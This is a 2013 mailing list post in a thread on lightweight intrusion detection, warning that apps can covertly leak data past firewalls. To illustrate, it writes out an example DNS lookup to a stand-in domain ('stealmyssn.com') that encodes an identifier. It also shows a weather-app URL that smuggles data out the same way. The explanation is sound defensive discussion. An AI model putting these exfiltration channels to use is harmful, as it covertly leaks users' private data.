[Tfug] Lightweight IDS options/strategy/policy
Bexley Hall
bexley401 at yahoo.com
Wed Sep 25 16:28:28 MST 2013
Hi Kramer,
On 9/25/2013 3:57 PM, Kramer Lee wrote:
> "appears to only be "reading" from the outside world"
>
> Well, it depends on what they are reading.
>
> Probably the good info they get will be sent out encrypted. If you
> have some NSA grade encryption busters, you can see what it is and
> maybe stop it. If they have some NSA grade back-doors etc, they might
> be able to get whatever they want.
nslookup(123771665.stealmyssn.com)
I.e., if you let an app *look* at something, you have to assume
that it *can* pass that information to a third party despite
any firewalls, etc. that you put in place.
E.g., install a "weather reporting" app and the above could be passed
resolving http://www.weatherthief.com/currentweather/123771665.html
If the system runs 24/7/365 then it can covertly pass a *boatload*
of information without raising any eyebrows!
More information about the tfug
mailing list